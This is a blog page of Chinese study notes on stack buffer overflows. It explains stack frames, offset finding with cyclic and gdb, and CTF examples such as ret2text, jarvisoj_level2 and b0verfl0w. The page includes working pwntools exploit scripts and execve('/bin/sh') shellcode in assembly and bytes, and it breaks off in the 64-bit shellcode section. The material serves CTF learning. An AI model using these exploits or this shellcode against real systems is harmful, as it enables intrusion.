<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Keep Team">
    
    <title>
        
        Keep Theme
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.svg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Keep Theme","author":"Keep Team","avatar":"/images/avatar.svg","logo":"/images/logo.svg","favicon":"/images/logo.svg"},"menu":{"home":"/","archives":"/archives"},"first_screen":{"enable":false,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":false,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":false,"style":"default"},"highlight_theme":"default"},"toc":{"enable":false,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":false,"preload":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.36"},"waline":{"server_url":null,"reaction":false,"version":"3.2.1"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":false,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.3"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original post title","author":"Original post author","link":"Original post link"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               Keep Theme
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                HOME
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                ARCHIVES
                                
                            </a>
                            
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            HOME
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            ARCHIVES
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/avatar.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Keep Team</span>
                                
                                    <span class="author-badge">Lv1</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2024-05-22 15:08:28</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Fri Jul 12 2024 10:11:51 GMT+0800">2024-07-12 10:11:51</span>
            </span>
        

        

        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h1 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h1><h2 id="原理手段"><a href="#原理手段" class="headerlink" title="原理手段"></a>原理手段</h2><p>栈：是只允许在一端进行插入或删除的线性表。首先栈是一种线性表63997)，但限定这种线性表只能在某一端进行插入和删除操作。<font color='red'>高地址到低地址布局，拷贝需从低地址开始</font></p>
<p>push——ESP-4&#x2F;8                32位系统为4</p>
<p>pop——ESP+4&#x2F;8                  64位系统为8</p>
<p>栈两个寄存器：ESP指向栈顶低地址、EBP指向栈底高地址</p>
<p>栈溢出： <b><font color='red' size=3 face="">向栈中某个变量写入字节数超过变量本身申请的</font></b> ，导致其相邻的栈中其他重要数据被破坏</p>
<p>栈函数调用的过程</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707205020357.png"  alt="image-20240707205020357"></p>
<h3 id="函数调用过程中涉及操作指令"><a href="#函数调用过程中涉及操作指令" class="headerlink" title="函数调用过程中涉及操作指令"></a>函数调用过程中涉及操作指令</h3><ol>
<li>压栈(push):栈顶指针esp减小4字节;以字节为单位将寄存器数据(4字节，不足补0)压入堆栈，从高到低依次将数据存人esp-1、esp-2、esp-3、esp-4指向的地址单元。</li>
<li>出栈(pop):栈顶指针esp指向的栈中数据被取回寄存器;栈顶指针esp增加4字节。push和pop指令在不同系统上运行时稍有不同，在64位系统中变化的大小是8字节，在32位系统中变化的大小是4字节。</li>
<li>调用(ca11):将当前的指令指针eip(该指针指向ca11指令后的下条指令)压入堆栈，以返回时能恢复执行下条指令。然后，设置eip指向被调函数的开始处，以跳转到被调函数的入口地址处执行。</li>
<li>离开(1eave):恢复主调函数的栈帧以准备返回，它等价于以下指令序列:<br>mov esp，ebp(恢复原esp值，指向被调函数栈帧开始处);<br>pop ebp(恢复原 ebp 的值，即主调函数帧基指针)</li>
<li>返回(ret):与ca11指令配合，用于从函数或过程返回。从栈顶弹出返回地址(之前 ca11指令保存的下条指令地址)到eip寄存器中，程序转到该地址处继续执行(此时 esp指向进人函数时的第一个参数)。若带有立即数，esp要加上立即数(丢弃一些在执行ca11指令前入栈的参数)。使用该指令前，应使当前栈顶指针所指向位置的内容正好是先前ca11指令保存的返回地址。</li>
</ol>
<h2 id="初识栈溢出"><a href="#初识栈溢出" class="headerlink" title="初识栈溢出"></a>初识栈溢出</h2><p><strong>当我们调用一个函数的时候，在函数内部存在，栈溢出漏洞，get函数或者开辟空间大于变量距离栈底的位置，那么就可能造成栈溢出，溢出后如果溢出值覆盖了main_addr,函数的返回地址就会变化，我们可以根据这个特点，篡改返回地址到我们想返回的。</strong></p>
<ul>
<li>距离栈底0x80个字节，但是允许读取0x200个字节，就会造成栈溢出</li>
</ul>
<p><img   src="https://img2024.cnblogs.com/blog/3340174/202406/3340174-20240615151711628-1251544727.png"  alt="img"></p>
<h3 id="例题1-，存在后门函数"><a href="#例题1-，存在后门函数" class="headerlink" title="例题1 ，存在后门函数"></a>例题1 ，存在后门函数</h3><p><a class="link"   target="_blank" rel="noopener" href="https://static2.ichunqiu.com/icq/resources/exp_file/NU1L-CTF/PWN/2.zip" >https://static2.ichunqiu.com/icq/resources/exp_file/NU1L-CTF/PWN/2.zip<i class="fas fa-external-link-alt"></i></a></p>
<ul>
<li><p>查看保护	</p>
<p><img   src="https://img2024.cnblogs.com/blog/3340174/202406/3340174-20240616153452139-148592813.png"  alt="img"></p>
</li>
<li><p>查看逻辑		</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707211234993.png"  alt="image-20240707211234993"></p>
</li>
<li><p><strong>这里有两种判断偏移的方式</strong></p>
<ul>
<li><p>第一种就是看图片上红框部分，显示s距离ebp为0x108个字节所以需要填充0x108+0x4个字节的数据才能覆盖返回地址</p>
</li>
<li><p>使用pwngdb中cyclic判断偏移，在call gets（main）处下断点，用gdb调试</p>
<ul>
<li><p>gdb  文件名<img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707211609776.png"  alt="image-20240707211609776"></p>
</li>
<li><p>b * 0x+main()地址</p>
</li>
<li><p>r运行</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707211844397.png"  alt="image-20240707211844397"></p>
</li>
<li><p>n–下断点</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707211937082.png"  alt="image-20240707211937082"></p>
</li>
<li><p>cyclic 300（比可容纳地址大）</p>
</li>
<li><p>c，然后输入得到的300字符串，得到异常返回地址，程序停止</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707212348613.png"  alt="image-20240707212348613"></p>
</li>
<li><p>用cyclic -l 异常地址   得到偏移</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707212551007.png"  alt="image-20240707212551007"></p>
</li>
<li><p>写Exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">filename = <span class="string">&#x27;./ret2text&#x27;</span></span><br><span class="line">p = process(filename)</span><br><span class="line">binsh_addr = <span class="number">0x08048514</span> <span class="comment">#后门函数地址</span></span><br><span class="line">p.sendline(<span class="string">&#x27;ret2text&#x27;</span>)<span class="comment">#传送的数据</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">268</span> + p32(binsh_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="例题2"><a href="#例题2" class="headerlink" title="例题2"></a>例题2</h3><p>[BUUCTF在线评测 (buuoj.cn)](<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[%E7%AC%AC%E5%8D%81%E4%BA%94%E7%AB%A0][15.3.1" >https://buuoj.cn/challenges#[第十五章][15.3.1<i class="fas fa-external-link-alt"></i></a> 栈溢出基本攻击]stack_example)</p>
<ul>
<li>函数使用<code>gets</code>函数从标准输入读取数据，这可能导致缓冲区溢出，因为<code>gets</code>函数不检查输入数据的长度，可能会导致读取超过数组大小的数据。</li>
</ul>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707205807825.png"  alt="image-20240707205807825"></p>
<p>其他相同写Exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># remote_host是远程服务器的地址</span></span><br><span class="line">remote_host = <span class="string">&#x27;node5.buuoj.cn&#x27;</span></span><br><span class="line"><span class="comment"># remote_port是远程服务器上监听的端口</span></span><br><span class="line">remote_port = <span class="number">25723</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 连接到远程服务器</span></span><br><span class="line">p = remote(remote_host, remote_port)</span><br><span class="line"></span><br><span class="line"><span class="comment"># binsh_addr是/bin/sh的地址，这个需要根据远程程序的实际情况来确定</span></span><br><span class="line">binsh_addr = <span class="number">0x08048474</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 构造payload</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">24</span> + p32(binsh_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 发送payload到远程程序</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 与远程程序的交互式shell进行交互</span></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240707213139247.png"  alt="image-20240707213139247"></p>
<h3 id="例题3：存在两个system，并且存“-bin-sh”"><a href="#例题3：存在两个system，并且存“-bin-sh”" class="headerlink" title="例题3：存在两个system，并且存“&#x2F;bin&#x2F;sh”"></a>例题3：存在两个system，并且存“&#x2F;bin&#x2F;sh”</h3><p><a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#jarvisoj_level2" >BUUCTF在线评测 (buuoj.cn)<i class="fas fa-external-link-alt"></i></a></p>
<p>调用函数之前调用后门函数<img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240708100918942.png"  alt="image-20240708100918942"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">27597</span>)</span><br><span class="line">shell_addr=<span class="number">0x0804A024</span></span><br><span class="line">system=<span class="number">0x8048320</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x88</span>+<span class="number">0x4</span>)+p32(system)+p32(shell_addr)<span class="comment">#0x88是距离栈底的字节，0x4是32位</span></span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="防御手段"><a href="#防御手段" class="headerlink" title="防御手段"></a>防御手段</h2><h3 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h3><p>NX打开不能执行shellcode返回溢出</p>
<p><font color='red'>是指一段用于完成某个功能的代码</font>：常用于获取目标系统的shell</p>
<h4 id="特点："><a href="#特点：" class="headerlink" title="特点："></a>特点：</h4><p>​			短小精悍</p>
<p>​			通常为16进制的机器码</p>
<p>​			重复利用</p>
<h4 id="计算缓冲区地址"><a href="#计算缓冲区地址" class="headerlink" title="计算缓冲区地址"></a>计算缓冲区地址</h4><ul>
<li>cyclic -l XX</li>
</ul>
<h4 id="编写"><a href="#编写" class="headerlink" title="编写"></a>编写</h4><p><strong>32位：</strong></p>
<p>int 80h中断调用我们传参的前三个寄存器分别是ebx,ecx,edx</p>
<p>首先是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xor ecx,ecx</span><br><span class="line">xor edx,edx</span><br></pre></td></tr></table></figure>

<p>清空两个参数为0的寄存器</p>
<p>然后是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">xor ebx,ebx </span><br><span class="line">push ebx</span><br><span class="line">push 0x68732f2f</span><br><span class="line">push 0x6e69622f</span><br><span class="line">mov ebx,esp</span><br></pre></td></tr></table></figure>

<p>此时把参数&#x2F;bin&#x2F;sh压入栈，最开始push ebx是先压入栈中一个0，用来字符串截断。最后将esp指向的地址赋给了ebx，此时ebx的值就是&#x2F;bin&#x2F;sh的地址。</p>
<p><img   src="https://s2.loli.net/2022/06/07/HwopUbyABF6SDzc.png"  alt="img"></p>
<p>此时栈中的情况就是这样，&#x2F;bin&#x2F;sh与&#x2F;bin&#x2F;&#x2F;sh的效果一样，至于为什么要存入字符串的时候，要反着写，在64位汇编编写shellcode的时候，已经解释过了，这里就不再重复。</p>
<p>最后是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">xor eax,eax</span><br><span class="line">push 11</span><br><span class="line">pop eax</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure>

<p>现在是把系统调用号存进去并且进行了系统调用</p>
<p>最后把这三部分结合一下效果如下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">xor ecx,ecx</span><br><span class="line">xor edx,edx</span><br><span class="line">xor ebx,ebx </span><br><span class="line">push ebx</span><br><span class="line">push 0x68732f2f#//sh的ASCII码</span><br><span class="line">push 0x6e69622f#/bin的ASCII码</span><br><span class="line">mov ebx,esp</span><br><span class="line">xor eax,eax</span><br><span class="line">push 11</span><br><span class="line">pop eax</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure>

<p>​	1.将EAX寄存器的值设置为0xb:EAX &#x3D; 0xb<br>2. 将EBX寄存器的值设置为”&#x2F;bin&#x2F;sh”字符串的地址:EBX&#x3D;&amp;(“&#x2F;bin&#x2F;sh&#x2F;x00”)</p>
<ol start="3">
<li><p>将ECX和EDX寄存器的值都设为0:ECX&#x3D;EDX&#x3D;0</p>
</li>
<li><p>调用int 0x80</p>
</li>
</ol>
<p>  执行系统函数sys_execve(“&#x2F;bin&#x2F;sh”,NULL,NULL)</p>
<p>  <img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240708151114046.png"  alt="image-20240708151114046"></p>
<p>  转换为机器码</p>
<h6 id="例题：b0verflow-跳转到jmp-esp"><a href="#例题：b0verflow-跳转到jmp-esp" class="headerlink" title="例题：b0verflow(跳转到jmp esp)"></a>例题：b0verflow(跳转到jmp esp)</h6><p><a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#x_ctf_b0verfl0w" >BUUCTF在线评测 (buuoj.cn)<i class="fas fa-external-link-alt"></i></a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  X-CTF Quals 2016 - b0verfl0w git:(iromise) ✗ checksec b0verfl0w                 </span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br><span class="line">    RWX:      Has RWX segments</span><br></pre></td></tr></table></figure>

<p>可以看出源程序为 32 位，也没有开启 NX 保护，下面我们来找一下程序的漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">signed int vul()</span><br><span class="line">&#123;</span><br><span class="line">  char s; // [sp+18h] [bp-20h]@1</span><br><span class="line"></span><br><span class="line">  puts(&quot;\n======================&quot;);</span><br><span class="line">  puts(&quot;\nWelcome to X-CTF 2016!&quot;);</span><br><span class="line">  puts(&quot;\n======================&quot;);</span><br><span class="line">  puts(&quot;What&#x27;s your name?&quot;);</span><br><span class="line">  fflush(stdout);</span><br><span class="line">  fgets(&amp;s, 50, stdin);</span><br><span class="line">  printf(&quot;Hello %s.&quot;, &amp;s);</span><br><span class="line">  fflush(stdout);</span><br><span class="line">  return 1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看出，源程序存在栈溢出漏洞。但是其所能溢出的字节就只有 50-0x20-4&#x3D;14 个字节，所以我们很难执行一些比较好的 ROP。这里我们就考虑 stack pivoting 。由于程序本身并没有开启堆栈保护，所以我们可以在栈上布置 shellcode 并执行。基本利用思路如下</p>
<ul>
<li>利用栈溢出布置 shellcode</li>
<li>控制 eip 指向 shellcode 处</li>
</ul>
<p>第一步，还是比较容易地，直接读取即可，但是由于程序本身会开启 ASLR 保护，所以我们很难直接知道 shellcode 的地址。但是栈上相对偏移是固定的，所以我们可以利用栈溢出对 esp 进行操作，使其指向 shellcode 处，并且直接控制程序跳转至 esp 处。那下面就是找控制程序跳转到 esp 处的 gadgets 了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">➜  X-CTF Quals 2016 - b0verfl0w git:(iromise) ✗ ROPgadget --binary b0verfl0w --only &#x27;jmp|ret&#x27;         </span><br><span class="line">Gadgets information</span><br><span class="line">============================================================</span><br><span class="line">0x08048504 : jmp esp</span><br><span class="line">0x0804836a : ret</span><br><span class="line">0x0804847e : ret 0xeac1</span><br><span class="line"></span><br><span class="line">Unique gadgets found: 3</span><br></pre></td></tr></table></figure>

<p>这里我们发现有一个可以直接跳转到 esp 的 gadgets。那么我们可以布置 payload 如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shellcode|padding|fake ebp|0x08048504|set esp point to shellcode and jmp esp</span><br></pre></td></tr></table></figure>

<p>那么我们 payload 中的最后一部分改如何设置 esp 呢，可以知道</p>
<ul>
<li>size(shellcode+padding)&#x3D;0x20</li>
<li>size(fake ebp)&#x3D;0x4</li>
<li>size(0x08048504)&#x3D;0x4</li>
</ul>
<p>所以我们最后一段需要执行的指令就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sub esp,0x28</span><br><span class="line">jmp esp</span><br></pre></td></tr></table></figure>

<p>所以最后的 exp 如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">&#x27;./b0verfl0w&#x27;</span>)</span><br><span class="line"></span><br><span class="line">shellcode_x86 = <span class="string">&quot;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73&quot;</span></span><br><span class="line">shellcode_x86 += <span class="string">&quot;\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0&quot;</span></span><br><span class="line">shellcode_x86 += <span class="string">&quot;\x0b\xcd\x80&quot;</span></span><br><span class="line"></span><br><span class="line">sub_esp_jmp = asm(<span class="string">&#x27;sub esp, 0x28;jmp esp&#x27;</span>)</span><br><span class="line">jmp_esp = <span class="number">0x08048504</span></span><br><span class="line">payload = shellcode_x86 + (</span><br><span class="line">    <span class="number">0x20</span> - <span class="built_in">len</span>(shellcode_x86)) * <span class="string">&#x27;b&#x27;</span> + <span class="string">&#x27;bbbb&#x27;</span> + p32(jmp_esp) + sub_esp_jmp</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h5 id="64位"><a href="#64位" class="headerlink" title="64位"></a><strong>64位</strong></h5><p> <strong>64位寄存器传参的前三个寄存器分别是rdi,rsi,rdx</strong></p>
<p><strong>系统调用号放入rax寄存器，然后syscall就可以执行对应的系统调用函数</strong></p>
<p>  <b><font color='red' size=3 face="">目的是执行execve(“&#x2F;bin&#x2F;sh”,0,0)</font></b> </p>
<ul>
<li><p>因为程序本来是没有这个execve函数的，但是我们现在要凭空给它造一个，因此这里系统调用execve（你可以理解为，执行syscall指令之前将rax装成对应的系统调用号，就可以执行对应的系统调用。</p>
</li>
<li><p>将第一个参数存入”&#x2F;bin&#x2F;sh”</p>
</li>
<li><p>将第二个、第三个参.数存入0<br><b><font color='blue' size=3 face=""><strong>我们要做的是在系统调用execve之前，去把需要的参数都存进去</strong>xor rdx,rdx</font></b></p>
</li>
</ul>
<p>  xor rsi,rsi #此时去把rsi，rdx两个寄存器都存成0，至于这里为什么不用mov rdx,0和mov rsi,0。主要是避免出现00字符来截断,用strcpy这类函数的时候考虑00截断，xor rsi,rsi所需字节数更少</p>
<p>   <b><font color='blue' size=3 face=""> 将第一个参数存入rdi，<strong>把&#x2F;bin&#x2F;sh对应的ascii码的<em>地址</em>给rdi即可 传参的时候，要调用的函数会自己去这个地址里找到对应的&#x2F;bin&#x2F;sh。</strong></font></b></p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">xor rdi,rdi</span><br><span class="line"></span><br><span class="line">push rdi   #此时的rdi是0，要把这个0压入栈顶，当下面把0x68732f2f6e69622f压入栈顶之后，这个0就起到了截断字符串的作用（用来声明，execve的第一个参数字符串到哪结束）</span><br><span class="line"></span><br><span class="line">mov rdi,0x68732f2f6e69622f  #现在rdi的值是0x68732f2f6e69622f</span><br><span class="line"></span><br><span class="line">push rdi    #此时参数0x68732f2f6e69622f（即/bin//sh)就存在了栈顶的内存单元中</span><br><span class="line"></span><br><span class="line">lea rdi,[rsp]     #等同于mov rdi,rsp  此时是把栈顶的地址（一定要注意，是栈顶的地址，就是rsp本身的值（rsp本身就是个地址），赋值给rdi，也就是说此时rdi的值就是参数的地址</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>  <strong>两点需要注意：</strong></p>
<ul>
<li><p>这个0x68732f2f6e69622f是&#x2F;bin&#x2F;&#x2F;sh对应的ascii码。<strong>并且他是倒着存的</strong>，因为asm在把我们写的<strong>汇编语言转换成机器码的时候，会因为小端序的原因将输入的内容给倒过来</strong>。别的机器码我们不用担心，但是我们输入的字符串，需要手动先给倒过来一次，这样等到汇编语言转换成机器码的时候，再倒过来一次，程序处理字符串的时候，就会拿到真正的参数&#x2F;bin&#x2F;&#x2F;sh，而非hs&#x2F;&#x2F;nib&#x2F;。</p>
</li>
<li><p><strong>0x68732f2f6e69622f中间这里出现了两2f(也就是两个&#x2F;)，因为这里要填充够八个字节（64位程序中，一个内存单元就只能装八个字节）</strong></p>
<p>​		<strong>rsp的值和rsp的内容是两码事</strong></p>
<p>​				rsp的值，就是栈顶内存单元的地址</p>
<p>​				rsp的内容，就是栈顶的内存单元中的内容</p>
<p>​		<strong>为了达到上述的效果，我们还可以这么写。</strong></p>
